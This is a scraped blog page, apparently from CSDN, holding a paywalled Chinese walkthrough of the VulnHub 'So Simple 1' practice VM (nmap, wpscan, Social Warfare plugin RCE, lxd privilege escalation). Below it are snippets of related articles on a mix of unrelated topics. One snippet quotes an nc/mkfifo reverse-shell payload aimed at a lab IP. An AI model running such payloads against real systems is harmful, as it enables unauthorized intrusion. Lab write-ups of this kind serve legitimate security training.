vulnhub-So Simple 1

最新推荐文章于 2024-03-20 23:45:00 发布
最新推荐文章于 2024-03-20 23:45:00 发布
阅读量1.7k 收藏
点赞数
分类专栏: vulnhub 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yutianovo/article/details/107907158
版权

靶机描述

This is an easy level VM with some rabbitholes. Enumeration is key to find your way in. There are three flags (2 user and 1 root flag).

The VM is tested on Virtualbox. After the startup it shows the IP address.

Share your rootflag with me on Twitter: @roelvb79

Good luck and have fun!


This works better with VirtualBox rather than VMware

下载 https://www.vulnhub.com/entry/so-simple_1,515/

清单

  • 信息搜集
    • namp
    • wpscan
  • 提权
    • 带有漏洞的插件Social Warfare v3.5.0
    • 反弹shell
    • lxd组
    • 得到 root

信息搜集

靶机IP

image-20200809160222421

端口扫描

nmap -A 192.168.0.105

Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-09 10:32
最低0.47元/天 解锁文章
OSCP-3-4-So-Simple-1(wordpress插件漏洞、service提权、没有suid创建suid、sudo -u 用户名)
墨痕诉清风的博客
08-25 161
2. token扫描:wpscan --url http://172.16.12.16/wordpress/ -e ap --plugins-detection aggressive --api-token api token。1. 用户扫描:wpscan --url http://172.16.12.16/wordpress/ -e -P /usr/share/wordlists/nmap.lst。max用户目录下有.ssh公钥登录。打开网址查看漏洞利用方法。扫描到插件还是有漏洞的。...
[AI in security]-216 开源威胁情报线索【仅供学习研究使用】
AI拉呱,专注于人工智与网络安全方面的研究,关注一起学习。
08-08 1803
暗网大屏:https://gcokedsa123.grafana.net/dashboard/snapshot/2OJ9OtmtitwiGcIqwIVhvzgmTKDBtTkF?9.深信服安全中心 https://wiki.sec.sangfor.com.cn/index/abroad。微步测绘:https://x.threatbook.com/v5/mapping。火花:https://ti.venuseye.com.cn/#/home。
SO SIMPLE: 1靶机
logan_logan的博客
07-22 363
1.在浏览器输入地址打开 2.端口扫描 nmap -A -p- -T4 10.36.101.171 开的端口不是很多,不过可以看到8443端口后面包含有LXD的信息,说不定在提权的时候能用到; 3.目录枚举 目录枚举的时候看到有wordpress,准备上Wpscan工具进行枚举; 4.在网页打开这个目录 查看源代码的时候发现Social Warfare竟然是3.5版本的,判断很可能出现Social Warfare <= 3.5.2 - Unauthenticated Remote Code
vulnhub靶机-So Simple: 1
臭nana的博客
08-10 1574
1、靶机开机即得ip地址:192.168.8.109 2、扫描靶机端口 root@kali:~# nmap -A -p- 192.168.8.109 Starting Nmap 7.80 ( https://nmap.org ) Nmap scan report for so-simple (192.168.8.109) Host is up (0.00056s latency). Not shown: 65532 closed ports PORT STATE SERVICE VERSION
Vulnhub靶机系列:SecTalks: BNE0x03 - Simple
汗的博客
04-21 631
这次的靶机是vulnhub靶机:SecTalks: BNE0x03 - Simple 文章目录靶机地址及相关描述靶机地址靶机描述Simple CTFLocationHints靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 靶机地址 https://www.vulnhub.com/entry/sectalks-bne0x03-simple,141/ 靶机描述 Simpl...
vulnhub:So-Simple-1靶机
qq_43884092的博客
01-02 282
靶机:192.168.111.136kali:192.168.111.111端口扫描80端口目录爆破访问wordpress目录发现是wordpress站点使用wpscan扫描发现一个插件发现该插件存在漏洞漏洞利用本地创建shell.txt,内容写入<pre> system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 192.168.111.111 4444 >/tmp/f'); </pre> 使
红队打靶:BNE0X03_SIMPLE打靶思路详解(vulnhub
Bossfrank的博客
07-21 797
本文是vulnhub靶机BNE0X03 SIMPLE的详细打靶过程。涉及到的知识点包括关于cms漏洞利用、文件上传漏洞、内核提权等。靶机较为容易,经典的攻击链,困难点在于如何选择合适的内核提权利用文件。
VulnHub—DC-5
weixin_39219503的博客
02-01 759
01 环境搭建 靶机环境下载:https://www.vulnhub.com/entry/dc-5,314/ 题目信息如下,只有一个flag Description DC-5 is another purposely built vulnerable lab with the intent of gaining experience in the world of penetration te...
DC-1靶机教程
qq_42553928的博客
04-07 5767
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
实战打靶集锦-027-SoSimple1
最新发布
阿尔泰野狼的博客
03-20 1942
本文简单记录了博主的一次打靶经历,涉及wordpress扫描与爆破、social-warfare远程代码执行漏洞、sudo命令提权等
apk文件 RemoteIME(电视直播视频)
06-24
apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直播视频)apk文件 RemoteIME(电视直
使用docker网络相关命令
zlw01234的博客
02-05 7257
翻译自docker官方文档,原文:https://docs.docker.com/engine/userguide/networking/work-with-networks/ 这篇文章提供了几个你可以用来和docker网络及其中的容器进行交互的网络子命令的例子。这些命令可以通过docker引擎的命令行接口(CLI)使用,命令如下: docker network create docker
安装nextcloud文档
weixin_44048054的博客
07-25 4908
PHP安装 库remi安装 安装mariadb 安装NEXTCLOUD
使用okhttp 出现 java.net.ConnectException: Failed to connect to /192.168.1.121:8888
热门推荐
songzi1228的博客
05-30 1万+
使用okhttp 出现 java.net.ConnectException: Failed to connect to /192.168.1.121:8888 compile 'com.squareup.okhttp3:okhttp:3.3.0' //okttp依赖 项目使用okhttp3.3.0,结果运行时出现如上错误,经过排查发现是由于retrofit的原因,把如下三个依赖删除就行了 ...
Ansible常用模块详解
weixin_43265596的博客
08-15 1098
1. Ansible模块 1.1 ping模块 1.2command 常用参数 例1:列出root用户根目录下的文件 1.3 shell模块 常用参数 例1:输出远程主机的主机名 1.4 file模块 常用参数 例1:创建目录 例2:创建文件 例3:创建软连接 1.5copy模块 常用参数 例1:复制文件到远程主机 1.6script模块 常用参数 例1...
0.0.0.0 127.0.0.1 localhost 192.168.1.xxx 区别与联系?
weixin_34114823的博客
05-06 477
(a)0.0.0.0:是一个非常特殊的IP地址,这个IP相当于java中的this,代表当前设备的IP,可以跟着变化,并不指代一个确定的一个。 (b)127.0.0.1:是回送地址,指本地机,一般用来测试使用。回送地址(127.x.x.x)是本机回送地址(Loopback Address),即主机IP堆栈内部的IP地址,主要用于网络软件测试以及本地机进程间通信,无论什么程序,一旦使用回送地址发送...
vulnhub wpwn: 1
箭雨镜屋
07-23 971
渗透思路:nmap扫描 ---- gobuster扫描网站目录 ---- wpscan扫描发现漏洞插件 ---- 利用wordpress插件Social Warfare的RCE漏洞getshell(无需登录)---- wordpress配置文件泄露明文密码,切换到用户takis ---- sudo su提权 ---- 查看.bash_history发现flag...
[网络安全自学篇] 六十五.Vulnhub靶机渗透之环境搭建及JIS-CTF入门和蚁剑提权示例(一)
whyrookie的博客
04-15 9603
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了SMBv3服务远程代码执行漏洞(CVE-2020-0796),攻击者可能利用此漏洞远程无需用户验证,执行恶意代码并获取机器的完全控制。本文将详细讲解Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Sh...
web狗日记之Vulnhub-five86-2
梦之序章的博客
04-13 738
主要考察: 1、wpcms渗透技巧 2、Wpcms插件漏洞的使用 3、流量捕获以及分析 4、Linux提权 Vulnhub官网速度感人,朋友给了这个站点,下载比较快点:http://five86.com/five86-2.html 导入到虚拟机里,ip貌似为动态分配,网卡我习惯设置为桥接模式,于是nmap扫出d段,这个不用废话了,也没截图。 找到ip登录主站的时候,去说明前看了看,大概了解,不是那...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值